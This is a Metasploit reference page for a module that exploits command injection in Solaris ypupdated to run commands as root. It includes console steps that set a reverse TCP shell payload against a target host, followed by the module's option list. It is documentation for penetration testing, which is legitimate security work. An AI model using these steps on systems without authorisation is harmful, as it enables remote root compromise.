Metasploit Penetration Testing Framework


OSVDB: CVE:
BID: MSB:
TEXT:


Solaris ypupdated Command Execution

This exploit targets a weakness in the way the ypupdated RPC application uses the command shell when handling a MAP UPDATE request. Extra commands may be launched through this command shell, which runs as root on the remote host, by passing commands in the format '|<command>'. Vulnerable systems include Solaris 2.7, 8, 9, and 10, when ypupdated is started with the '-i' command-line option.

Rank

  • Excellent

Authors

  • I)ruid < druid [at] caughq.org >

References

Exploit Targets

  • 0 - Automatic (default)

Development

Similar Modules

Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/solaris/sunrpc/ypupdated_exec
msf exploit(ypupdated_exec) > show payloads
msf exploit(ypupdated_exec) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(ypupdated_exec) > set LHOST [MY IP ADDRESS]
msf exploit(ypupdated_exec) > set RHOST [TARGET IP]
msf exploit(ypupdated_exec) > exploit

Module Options

GID GID to emulate (default: 0)
HOSTNAME Remote hostname (default: localhost)
RHOST The target address
RPORT The target port (default: 111)
UID UID to emulate (default: 0)
CHOST The local client address
CPORT The local client port
ConnectTimeout Maximum number of seconds to establish a TCP connection
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
Proxies Use a proxy chain
SSL Negotiate SSL for outgoing connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session
ONCRPC::tcp_request_fragmentation Enable fragmentation of TCP ONC/RPC requests
TCP::max_send_size Maxiumum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)
Copyright © 2003-2010 Rapid7 LLC
Rapid7 Privacy Statement